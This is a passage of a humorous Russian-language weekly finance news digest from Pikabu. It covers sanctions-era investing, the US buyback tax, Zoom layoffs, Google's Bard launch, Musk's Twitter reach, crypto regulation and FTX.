Логика создания такой биржи, судя по всему, в том, чтобы предоставить российским инвесторам безопасный от санкций выход на международные рынки на базе «нейтральной» юрисдикции. Правда, чем более дружественной для россиян окажется такая площадка – тем больше вероятность того, что рано или поздно западные партнеры настоятельно порекомендуют Казахстану аккуратно «прикрутить краник».

В том, что Казахстан станет отважно биться с западными регуляторами за права российских инвесторов у меня, если честно, закрадываются определенные сомнения.

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Говорят, фотографии с президентом Казахстана достаточно адово приукрашивают с помощью Фотошопа. Интересно, являются ли гарантии незаморозки активов российских инвесторов тоже, кхм, немного приукрашенными?

Президенту Байдену лишь бы деньги, деньги, деньги

Каждый раз, когда американские компании выплачивают дивиденды, инвесторам приходится платить с них подоходные налоги. В какой-то момент корпорации придумали прикольный лайфхак – байбэки (buybacks). Компании просто тратят те же деньги на выкуп своих акций с рынка: кто хочет – продает свои акции и получает взамен кэш; кто не хочет – наслаждается растущей ценой на акции без всех этих ваших налогов. Кайф!

Но демократам всё это активно не нравится: капиталисты-толостосумы платят мало налогов, безобразие! Вот с начала 2023 года в США и ввели налог на байбэки в размере 1%. С этого момента прошло чуть больше месяца, но в своем выступлении на прошлой неделе Байден уже заявил, что это какой-то несерьезный налог получился – говорит, надо срочно поднимать его до 4%.

Пока размер этих налогов в любом варианте всё равно сильно меньше того, что инвесторам приходится платить с дивидендов. Но тенденция, давайте признаем, не слишком радует: учетверение только что введенного налога – это как-то совсем не оч, Джо!

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Лицо Байдена, когда он увидел прибыль по твоему портфелю даже еще до уплаты налогов

Юаневые доходы упали на 98%

Еще недавно (в пандемийные времена) Zoom был одной из главных ракет фондового рынка, а сейчас вот им приходится объявлять об увольнении 15% сотрудников (более тысячи человек).

При этом основатель и гендир компании Эрик Юань (однофамилец китайской валюты) оказался парнем с яйцами: одновременно с массовыми увольнениями он сокращает себе зарплату в 50 раз (!) и отказывается от бонуса. Всем остальным топ-менеджерам Зума тоже прилетела скукожка по зарплате – правда, не такая радикальная, всего на 20%.

Такой поступок вызывает уважение. Хотя, было бы очень смешно, если Юань собирался сократить себе з/п на 9,8% – а секретарша просто опечаталась с запятой в пресс-релизе…

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Эрик Юань. Если будете ехать по Кремниевой долине в такси, и выглядящий примерно вот так водила будет затирать вам, что он на самом деле глава многомиллиардного бизнеса, а таксует чтобы прокормить семью – то это в кои-то веки может оказаться правдой!

Фестиваль бардовской песни у Гугла вышел так себе

Времена нынче такие, что уже решительно всем айти-компаниям стало понятно: если у тебя нет своего личного нейросетевого чатбота – то можно смело готовиться отправляться на свалку бизнес-истории. И наоборот!

Вот возьмите, к примеру, компанию Microsoft. Ее браузером Internet Explorer не пользуется примерно никто (и даже ксеноморфирование в Edge ему не помогло), и то же самое можно сказать об ее поисковике Bing. Но стоило Майкрософту договориться об инвестициях в ChatGPT/OpenAI на десяток миллиардов долларов и провести презентацию интегрированного в Edge/Bing чатбота в минувший вторник – как все дичайше кайфанули и толпами понеслись скачивать себе этот браузер.

Google грустно посмотрел на это, и на следующий же день провел свою собственную презентацию искусственного интеллекта под названием Bard. К сожалению, Бард показался публике весьма сырым и совершенно безынтересным на фоне конкурента – так что акции Гугла спикировали в течение пары дней после презентации более чем на 10%.

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

TradingView: Котировки акций Microsoft (оранжевый) и Google (синий). Как говорится – помогите Даше найти на графике момент, когда Google в прямом эфире презентовали своего уныловатого чатбота

Возможно, график выше потом будут проходить в школе на уроках истории в разделе про Первую Великую Скайнетовскую Войну. Училка будет спрашивать: «Дети, вам понятно, как капиталистическая конкуренция провоцировала гигантские корпорации на гонку за первенство в выпуске на массовый рынок ИИ без оглядки на безопасность?» И кремниево-электрические дети будут отвечать: «Да, учитель, хвала жадности побежденных кожаных мешков!»

Пожалейте разработчиков, лайкайте Маска в Твиттере поактивнее!

Говорят, что Илон Маск настолько недоволен низкими охватами своих твитов, что вызывает программистов на ковер и требует их отключить зловредные алгоритмы, прячущие масковские шутейки от его ста миллионов фолловеров. Программисты робко пытаются объяснить, что никаких специальных анти-илоновских алгоритмов и нет вовсе – и что даже в Google Trends популярность Илона за последний год снизилась примерно в десять раз…

Где-то в этот момент у Илона окончательно подгорает, и он просто увольняет разработчиков на месте.

Мораль тут простая: говорить неприятные вещи своему боссу – это и в общем случае небезопасная затея; а уж если твой босс еще и вложил 44 миллиарда долларов в то, чтобы закрепить свой статус самого популярного пацана в любимой соцсетке, – то тут и подавно, чисто самоубийственная миссия выходит, увы.

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Согласитесь, раньше эти истории про «бескомпромиссного Илона Маска» звучали как-то... ну, менее кринжово, что ли?

UPD: Сам Маск в итоге написал, что в алгоритмах показа его твитов действительно были проблемы, косвенно связанные со слишком большим количеством подписчиков – что как бы намекает на то, что инженеры, пытавшиеся «забуллщитить» Илона в ответ на его вопрос, были уволены не зря.

Регуляторы жмут криптобиржи

8 февраля криптобиржа Binance приостановила ввод и вывод средств с международного подразделения биржи банковскими переводами в долларах. Причины не называются, но биржа говорит, что этой фичей так и так пользовались всего 0,01% клиентов. Судя по всему, это как-то связано с нюансами регулирования: в свете череды крупных криптоскандалов, не все традиционные банки готовы продолжать сотрудничество с криптанами. (Все остальные способы вывода средств с Binance продолжают работать нормально.)

Также в новостях крипторегуляции: американская Комиссия по ценным бумагам (SEC) запретила криптобирже Kraken предлагать услуги стейкинга для своих клиентов и оштрафовала ее на $30 миллионов. Стейкинг – это когда ты вкладываешь свою криптомонетку в обеспечение работоспособности блокчейна, а взамен получаешь некую доходность. Так вот, SEC считает, что это всё подозрительно похоже на выпуск ценных бумаг – а значит, без подготовки соответствующих эмиссионных проспектов и прочей бюрократии заниматься этим никак нельзя.

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Глава SEC Гэри Генслер объясняет, чем стейкинг отличается от стейков

Что там у FTX?

Управляющие банкротством криптобиржи FTX направили всем американским политикам, ранее получавшим безвозмездные пожертвования от Сэма Бэнкмана-Фрида и его подельников на общую сумму в $93 млн, требование вернуть всё взад до конца февраля. Отмазки «мы всё на благотворительность потратили» не сканают, а с особо упертых обещают взыскать по суду еще и проценты. Таков путь!

Тем временем, Джастин Сан (начальник криптобиржи Huobi) собрался выпускать специальный токен FUD, якобы представляющий собой права требования обманутых кредиторов в адрес банкротящейся FTX. Интересно, что на этот счет скажет Комиссия по ценным бумагам США SEC? Вангую, что назовет токен «ценной бумагой» и посоветует всем причастным сразу же сдаться с поличным для многомиллионных штрафов.

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Лично мне Джастин Сан почему-то напоминает оцивиленного Моргенштерна в пиджачке

Добрая новость недели: 30% налог на уехавших удаленщиков решили не вводить

Говорят, Минфин РФ отказался от идеи обязать российские компании взимать налог 30% с зарплаты работающих в них по удаленке налоговых нерезидентов (напоминаю, что сейчас, если в трудовом договоре прописано зарубежное место исполнения обязанностей, то в такой ситуации можно законно требовать у российской стороны никакой налог из вашей зарплаты не вычитать). Ура! Правда, фрилансерам не на трудовом договоре всё равно хотят запилить повышение налогов…

* * *

Если подборка новостей показалась вам интересной – буду благодарен за подписку на мой ТГ-канал RationalAnswer, где я пытаюсь найти разумные подходы к личным финансам, инвестициям и крипте.

Показать полностью 9
[моё] Новости Финансы Инвестиции Налоги Биржа Фондовый рынок Экономика Бюджет Дефицит Евросоюз ZOOM Cloud Meetings ChatGPT Google Microsoft Илон Маск X (Twitter) Криптовалюта Криптобиржа Binance Длиннопост
22
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии